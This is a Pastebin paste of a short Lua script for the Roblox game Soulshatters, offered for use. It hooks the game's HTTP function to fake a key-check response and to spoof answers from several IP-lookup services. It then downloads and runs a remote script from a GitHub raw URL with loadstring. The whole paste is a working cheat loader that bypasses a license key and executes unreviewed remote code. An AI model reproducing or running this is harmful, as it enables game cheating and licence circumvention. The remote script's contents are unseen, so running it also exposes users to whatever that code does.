Advertisement
WilsonWubest

Soulshatters

May 11th, 2021
78
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.49 KB | None | 0 0
  1. --Key is "trollsters"
  2. local old = game.HttpGetAsync
  3. hookfunc(game.HttpGet, function(e, i)
  4. if i == "https://hj-bot.herokuapp.com/code?key=trollsters" then
  5. return "1"
  6. elseif i == "https://v4.ident.me" or i == "https://api.ipify.org" or i == "https://httpbin.org/get" or i == "https://api.myip.com" then
  7. return "<REDACTED>"
  8. end
  9. return old(e, i)
  10. end)
  11.  
  12. loadstring(game:HttpGet("https://raw.githubusercontent.com/HackerManRoblo/PlayersScript/master/main.lua"))()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement